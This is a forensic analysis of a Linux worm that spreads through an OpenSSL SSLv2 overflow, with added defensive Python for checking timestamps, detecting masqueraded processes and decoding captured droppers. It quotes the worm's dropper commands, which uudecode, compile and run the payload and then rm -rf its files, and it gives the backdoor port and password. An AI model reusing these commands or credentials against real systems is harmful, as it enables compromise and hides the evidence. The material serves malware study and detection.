1. What is the type of the .unlock file? When was it generated?
Running the file command on Linux yields the answer:

    $ file .unlock
    .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002, os: Unix
    $ gzip -l -S "" .unlock
             compressed        uncompressed  ratio uncompressed_name
                  17973               81920  78.0% .unlock
    $ mv .unlock .unlock.Z
    $ gunzip .unlock.Z
    $ file .unlock
    .unlock: GNU tar archive

(The -S "" option tells gzip to accept a file name without the .gz suffix; renaming the file to .unlock.Z does the same job for gunzip.)

So, the file .unlock is a gzip compressed tar file generated at 06:59:04 on the morning of September 20th, 2002. Two caveats apply to that timestamp: the gzip header stores MTIME as a Unix epoch value, which file renders in the local time zone of the analysis host, and per RFC 1952 MTIME is the modification time of the file gzip read, or the time compression started if the data came from a pipe (as it does with tar czf). It therefore records when the author packaged the worm, not when the source was written.
2. Based on the source code, who is the author
of this worm? When was it created? Is it compatible with the date
from question 1?
To answer this question, I first looked at the table of contents of the gunzipped tar file:

    $ tar tvf .unlock
    -rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
    -rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c

So the timestamps of the source files are 2002-09-20 09:28:11 and 2002-09-19 17:57:48, which do not correspond to the date from question 1: 2002-09-20 09:28:11 is 2 hours 29 minutes later than Fri Sep 20 06:59:04 2002, yet a member of an archive would normally be older than the archive built from it. This difference could be explained by the gzip file being generated on a different machine from the source code. Perhaps a badly set clock, or a difference in time zones between two computers, accounts for the difference? Note that both file and tar tvf convert stored epoch values to the analyst's local time, so the time zone of the analysis host cannot create the gap; it is present in the data itself.

The comments at the beginning of the .unlock.c file indicate that the worm was written by aion@ukr.net and contem@efnet. I suspect aion@ukr.net wrote most of the "worm" code, with the DDoS code written by contem@efnet.
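The timestamp comparison behind questions 1 and 2 can be automated so that both values are read straight from the on-disk structures and reported in UTC. The following is an added example, not code from the original writeup or from the worm: it parses the RFC 1952 gzip header (MTIME, OS, FNAME), walks the 512-byte ustar headers of the tar inside, and computes how far the newest member post-dates the gzip header. build_sample() fabricates a stand-in for .unlock carrying the timestamps quoted above (taken as UTC for the purpose of the example); its contents are constructed and contain nothing from the worm.

```python
"""Added example (not part of the original writeup): read the gzip header of a
.unlock-style file and the ustar headers of the tar it contains, and report
both timestamps in UTC.  build_sample() fabricates a stand-in for .unlock
with the timestamps the writeup reports (taken as UTC here); nothing in it
is the worm's data."""
import gzip
import io
import struct
import tarfile
import zlib
from datetime import datetime, timezone

OS_NAMES = {0: "FAT", 3: "Unix", 7: "Macintosh", 11: "NTFS", 255: "unknown"}


def utc(epoch):
    return datetime.fromtimestamp(epoch, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_gzip_header(data):
    """RFC 1952 fixed header plus the optional fields that precede the deflate stream."""
    if data[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    cm, flg, mtime, _xfl, osb = struct.unpack("<BBIBB", data[2:10])
    if cm != 8:
        raise ValueError("unsupported compression method %d" % cm)
    pos, name = 10, None
    if flg & 0x04:                                   # FEXTRA
        pos += 2 + struct.unpack("<H", data[pos:pos + 2])[0]
    if flg & 0x08:                                   # FNAME, NUL terminated
        end = data.index(b"\x00", pos)
        name, pos = data[pos:end].decode("latin-1"), end + 1
    if flg & 0x10:                                   # FCOMMENT
        pos = data.index(b"\x00", pos) + 1
    if flg & 0x02:                                   # FHCRC
        pos += 2
    # MTIME is a Unix epoch; 0 means "no timestamp" (gzip -n).  `file` shows it
    # in the local zone of the analysis host, so report UTC to compare across hosts.
    return {"mtime": mtime, "mtime_utc": utc(mtime) if mtime else None,
            "os": OS_NAMES.get(osb, str(osb)), "name": name, "header_len": pos}


def list_tar(tar_bytes):
    """Walk 512-byte ustar headers; return (name, size, mtime, owner) per member."""
    def num(field):                                   # octal, NUL/space padded
        return int(field.strip(b"\x00 ") or b"0", 8)

    def text(field):
        return field.split(b"\x00", 1)[0].decode("latin-1")

    members, pos = [], 0
    while pos + 512 <= len(tar_bytes):
        hdr = tar_bytes[pos:pos + 512]
        if hdr == b"\x00" * 512:                      # end-of-archive marker
            break
        size = num(hdr[124:136])
        members.append((text(hdr[0:100]), size, num(hdr[136:148]),
                        text(hdr[265:297]) + "/" + text(hdr[297:329])))
        pos += 512 + (size + 511) // 512 * 512        # member data is padded to 512
    return members


def timestamp_skew(gz_bytes):
    """Seconds by which the newest tar member post-dates the gzip MTIME (> 0 is odd)."""
    info = parse_gzip_header(gz_bytes)
    members = list_tar(gzip.decompress(gz_bytes))     # decompress also checks CRC32/ISIZE
    return info, members, max(m[2] for m in members) - info["mtime"]


def build_sample():
    """Constructed stand-in for .unlock; member mtimes and gzip MTIME from the writeup."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, body, mtime in ((".unlock.c", b"/* worm source */\n" * 8, 1032514091),
                                  (".update.c", b"/* backdoor */\n", 1032458268)):
            ti = tarfile.TarInfo(name)
            ti.size, ti.mtime, ti.uname, ti.gname = len(body), mtime, "root", "wheel"
            tf.addfile(ti, io.BytesIO(body))
    tar_bytes = buf.getvalue()
    # hand-built header: magic, CM=8 (deflate), FLG=FNAME, MTIME, XFL=0, OS=3 (Unix)
    hdr = struct.pack("<2sBBIBB", b"\x1f\x8b", 8, 0x08, 1032505144, 0, 3) + b".unlock\x00"
    co = zlib.compressobj(9, zlib.DEFLATED, -15)      # raw deflate, no zlib wrapper
    body = co.compress(tar_bytes) + co.flush()
    trailer = struct.pack("<II", zlib.crc32(tar_bytes) & 0xFFFFFFFF, len(tar_bytes))
    return hdr + body + trailer


if __name__ == "__main__":
    info, members, skew = timestamp_skew(build_sample())
    print("gzip: MTIME %d (%s UTC) os=%s name=%s"
          % (info["mtime"], info["mtime_utc"], info["os"], info["name"]))
    for name, size, mtime, owner in members:
        print("tar:  %-10s %6d %s UTC %s" % (name, size, utc(mtime), owner))
    print("newest member is %d s newer than the gzip header" % skew)
```

Run against the real .unlock (timestamp_skew(open(".unlock", "rb").read())) the same function reports the 8947-second gap directly, without going through the local-time rendering of file and tar.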
3. Which process name is used by the worm
when it is running?
The worm uses the process name httpd when running. We know this because of line 78 and lines 1803 through 1805 of the file .unlock.c:

    78:   #define PSNAME "httpd "
    1803: for(a=0;argv[0][a]!=0;a++) argv[0][a]=0;
    1804: for(a=0;argv[1][a]!=0;a++) argv[1][a]=0;
    1805: strcpy(argv[0],PSNAME);

The code above overwrites the process name and its single argument with null characters, then writes the value of the macro PSNAME to the process name, which in this case is httpd (with a trailing space). Note that at line 1425 of .unlock.c, the process on a target computer is first started as:

    /tmp/httpd {IP address of attacker}

and is ultimately rewritten as:

    httpd

Overwriting argv only changes what ps and /proc/PID/cmdline report; /proc/PID/exe still resolves to /tmp/httpd, and once the worm removes that binary (see question 4) the link reads "/tmp/httpd (deleted)", which is a reliable way to tell the worm from a genuine Apache httpd.
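The argv rewrite described above leaves traces in /proc that a host-based check can key on. The following is an added example, not code from the writeup or from the worm: it scores process records for the symptoms the worm leaves (executable under /tmp, executable unlinked while running, argv[0] padded with a trailing space, argv area zeroed in place) and also catches the more general trick of an argv[0] that names a different program than the executable. The records in SAMPLE_PROCS are constructed to mimic /proc/PID/{comm,cmdline,exe}; the attacker address 192.0.2.10 is a placeholder; collect_from_proc() builds equivalent records on a live Linux host.

```python
"""Added example (not from the original writeup): flag processes whose
argv has been rewritten the way the worm does it.  The sample records are
constructed to mimic /proc/<pid>/{comm,cmdline,exe}."""
import os
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    comm: str       # /proc/<pid>/comm: kernel's view, basename of the executable
    cmdline: bytes  # /proc/<pid>/cmdline: NUL-separated argv, as the process left it
    exe: str        # readlink(/proc/<pid>/exe); ends in " (deleted)" once unlinked


def argv_of(p):
    """argv[] as ps reconstructs it; the worm's NUL-filled argv[1] disappears."""
    return [a.decode(errors="replace") for a in p.cmdline.split(b"\x00") if a]


def suspicious(p):
    """Return the reasons this process looks like a masquerading binary, if any."""
    reasons = []
    argv = argv_of(p)
    exe_path = p.exe.replace(" (deleted)", "")
    if p.exe.endswith("(deleted)"):
        reasons.append("executable %s was unlinked while running" % exe_path)
    if exe_path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")):
        reasons.append("executable lives in a world-writable scratch directory")
    if argv:
        if os.path.basename(argv[0].strip()) != os.path.basename(exe_path):
            reasons.append("argv[0] %r does not name the executable" % argv[0])
        if argv[0] != argv[0].rstrip():
            reasons.append("argv[0] has trailing whitespace (PSNAME-style padding)")
    # A normal cmdline ends with exactly one NUL; extra NULs mean the original
    # (longer) arguments were zeroed in place rather than never being there.
    padding = len(p.cmdline) - len(p.cmdline.rstrip(b"\x00")) - 1
    if padding > 0:
        reasons.append("%d bytes of the argv area were zeroed in place" % padding)
    return reasons


def scan(procs):
    """Map pid -> reasons for every record that raised at least one."""
    return {p.pid: r for p in procs if (r := suspicious(p))}


def collect_from_proc():
    """Build Proc records from a live /proc (Linux only; root sees every exe link)."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/comm" % pid) as f:
                comm = f.read().strip()
            with open("/proc/%s/cmdline" % pid, "rb") as f:
                cmdline = f.read()
            exe = os.readlink("/proc/%s/exe" % pid)
        except OSError:            # process exited, kernel thread, or no permission
            continue
        procs.append(Proc(int(pid), comm, cmdline, exe))
    return procs


# Constructed sample.  The worm started as "/tmp/httpd 192.0.2.10" (22 bytes of
# argv incl. NULs), zeroed it and wrote "httpd " over argv[0]; the binary was
# then removed by the attacker's rm.  The others are a real Apache and a fake
# kernel thread (a different masquerade, not from the page).
SAMPLE_PROCS = [
    Proc(4242, "httpd", b"httpd " + b"\x00" * 16, "/tmp/httpd (deleted)"),
    Proc(1001, "httpd", b"/usr/sbin/httpd\x00-DSSL\x00", "/usr/sbin/httpd"),
    Proc(5150, ".x", b"[kworker/0:1]\x00", "/tmp/.x"),
    Proc(2, "kthreadd", b"", ""),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCS).items():
        print(pid, *reasons, sep="\n    ")
```

Legitimate daemons such as sendmail or postgres also rewrite argv to show status, so the trailing-whitespace and zeroed-area signals on their own are hints; combined with an executable in /tmp or an unlinked binary they are a strong indicator.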
4. In which format does the worm copy itself to
the newly infected machine? Which files are created in the whole process?
After the worm executes itself, which files remain on the infected machine?
The code block beginning at line 1416 of .unlock.c gives us the answers:

    writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
    zhdr(1);
    encode(sockfd);
    zhdr(0);
    writem(sockfd,"__eof__\n");
    writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
                  "tar xzf /tmp/.unlock -C /tmp/; "
                  "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
                  "gcc -o /tmp/update /tmp/.update.c;\n");
    sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
    writem(sockfd,rcv);
    sleep(3);
    writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                  " /tmp/httpd /tmp/update; exit; \n");

In the code above, the worm writes the output of the encode function into the file /tmp/.unlock.uu on the target machine through a shell here-document, then uses the target's uudecode command to produce /tmp/.unlock. The file /tmp/.unlock, a gzipped tar file, is extracted to produce the C source files /tmp/.unlock.c and /tmp/.update.c, which are in turn compiled to /tmp/httpd and /tmp/update respectively (note the -lcrypto: the target needs gcc and the OpenSSL development files, or propagation fails at this step). The worm then runs the two compiled binaries and, three seconds later, deletes every file it created except /tmp/.unlock, including the two running binaries. Only /tmp/.unlock remains on the machine.

So the worm copies itself in source form, uuencoded. The encode function uuencodes whatever is defined as WORMSRC, in this case /tmp/.unlock, which is why that one file is kept: if it is missing, the worm cannot propagate from that host.
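A capture of the shell channel therefore contains the complete dropped file, and it can be recovered without touching the infected host. The following is an added example, not code from the writeup or from the worm: build_dropper_stream() reproduces the sequence of writem() calls above for a given WORMSRC, and extract_dropper() does the reverse on a captured stream, uudecoding the here-document, hashing the result and pulling out the attacker address and the command list. zhdr() is not shown on the page, so the example assumes it emits the standard "begin 644 <name>" and "end" lines that uudecode requires; the payload bytes and the address 192.0.2.10 are constructed placeholders.

```python
"""Added example (not part of the original writeup): rebuild and then pick
apart the here-document the worm sends over its shell channel.  Assumes
zhdr() writes the usual uuencode 'begin'/'end' lines; payload and IP below
are constructed placeholders."""
import binascii
import hashlib
import re

HEREDOC_START = "cat > /tmp/.unlock.uu << __eof__; \n"
HEREDOC_END = "__eof__\n"


def uuencode(name, data, mode=0o644):
    """Classic uuencode: 'begin', 45-byte lines, a zero-length line, 'end'."""
    lines = ["begin %o %s\n" % (mode, name)]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii"))
    lines.append("`\n")
    lines.append("end\n")
    return "".join(lines)


def build_dropper_stream(payload, localip):
    """What the writem() calls at line 1416ff. put on the wire for WORMSRC's bytes."""
    return (HEREDOC_START
            + uuencode(".unlock", payload)
            + HEREDOC_END
            + "uudecode -o /tmp/.unlock /tmp/.unlock.uu; "
              "tar xzf /tmp/.unlock -C /tmp/; "
              "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; "
              "gcc -o /tmp/update /tmp/.update.c;\n"
            + "/tmp/httpd %s; /tmp/update; \n" % localip
            + "rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
              " /tmp/httpd /tmp/update; exit; \n")


def extract_dropper(stream):
    """Recover name, bytes, sha256, attacker IP and the command list from a capture."""
    start = stream.index(HEREDOC_START) + len(HEREDOC_START)
    # the terminator must be a whole line; a uuencoded line may contain '_'
    term = re.search(r"^__eof__\n", stream[start:], re.M)
    if term is None:
        raise ValueError("here-document never terminated")
    end = start + term.start()
    name, out, inside = None, bytearray(), False
    for line in stream[start:end].splitlines():
        if line.startswith("begin "):
            name, inside = line.split(" ", 2)[2], True
        elif line == "end":
            break
        elif inside and line.strip() not in ("", "`"):
            out += binascii.a2b_uu(line.encode("ascii"))
    after = stream[end + len(HEREDOC_END):]
    cmds = [c.strip() for c in after.replace("\n", ";").split(";") if c.strip()]
    m = re.search(r"/tmp/httpd (\d{1,3}(?:\.\d{1,3}){3})", after)
    return {"name": name, "data": bytes(out),
            "sha256": hashlib.sha256(out).hexdigest(),
            "attacker_ip": m.group(1) if m else None, "commands": cmds}


# Constructed stand-in for WORMSRC (/tmp/.unlock); not the real archive.
PAYLOAD = bytes(range(256)) * 3 + b"tail"

if __name__ == "__main__":
    found = extract_dropper(build_dropper_stream(PAYLOAD, "192.0.2.10"))
    print(found["name"], len(found["data"]), found["sha256"], found["attacker_ip"])
    for c in found["commands"]:
        print("  ", c)
```

The attacker address recovered here is the one the new victim will later pass along as localip (question 3), so a single capture yields both ends of the propagation chain plus a hash of the dropped archive to match against other captures.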
5. Which port is scanned by the worm?
The worm does a TCP scan of port 80. This is evident from the call to the atcp_connect function with the SCANPORT parameter, a macro defined to be 80. Only the plain HTTP port is probed; the SSL handshake used by the exploit is attempted against hosts that answer there.
6. Which vulnerability does the worm try to exploit?
On which architectures?
The worm tries to exploit the OpenSSL SSLv2 handshake buffer overflow, discussed in CERT Vulnerability Note VU#102795 (CVE-2002-0656). From line 1241 of .unlock.c, the array architectures, of type struct archs, defines the Linux distributions and corresponding Apache versions that the worm targets, one entry per build. They are:

    Linux Distro   Apache Version
    Gentoo         unknown
    Debian         1.3.26
    Red-Hat        1.3.6
    Red-Hat        1.3.9
    Red-Hat        1.3.12
    Red-Hat        1.3.19
    Red-Hat        1.3.20
    Red-Hat        1.3.22
    Red-Hat        1.3.23
    Red-Hat        1.3.26
    SuSE           1.3.12
    SuSE           1.3.17
    SuSE           1.3.19
    SuSE           1.3.20
    SuSE           1.3.23
    Mandrake       1.3.14
    Mandrake       1.3.19
    Mandrake       1.3.20
    Mandrake       1.3.23
    Slackware      1.3.26
7. What kind of information is sent by the
worm by email? To which account?
When the worm first infects a computer, it makes an SMTP connection to the mail server freemail.ukr.net and sends an e-mail with the from address test@microsoft.com to the account aion@ukr.net. The e-mail contains the hostid and the hostname of the newly infected computer, along with the IP address of the computer that did the infecting (i.e. the attacking machine). The code that does this is in the mailme function of the .unlock.c file. An outbound SMTP connection from a web server to freemail.ukr.net is therefore a usable network indicator of a fresh infection.
8. Which port (and protocol) is used by the
worm to communicate with other infected machines?
The worm uses UDP port 4156 to communicate with other infected machines. If directed to do so, it also uses UDP port 10100 to transmit e-mail addresses harvested from all filesystems mounted on the infected machine, except /proc, /dev and /bin.
9. Name 3 functionalities built into the worm
to attack other networks.
Among the many functionalities of this worm are UDP flood, TCP flood and DNS flood attacks. In an attack directive, the worm receives the target, the port (if applicable) and the duration of the attack. These values are stored in records of type *_rec, as defined in .unlock.c. Whenever the worm receives a command to attack, it relays the command to the other infected hosts it knows about, so one command issued to any node reaches the whole peer network.
10. What is the purpose of the .update.c
program? Which port does it use?
The .update.c program is a backdoor that listens on TCP port 1052, as defined by its PORT macro. The backdoor requires the password aion1981 before it accepts commands.
11. Bonus Question:
What is the purpose of the SLEEPTIME
and UPTIME values in the .update.c program?
The UPTIME value determines how long the backdoor stays bound and listening on port PORT before it closes all sockets and sleeps for SLEEPTIME seconds. The backdoor program runs in a continuous loop, listening for 10 seconds, then sleeping for 5 minutes. Because the port is open for only about 10 seconds in every 310, a single port scan of an infected host has roughly a 3% chance of seeing it; repeated probes spread over several minutes are needed to find it from the network.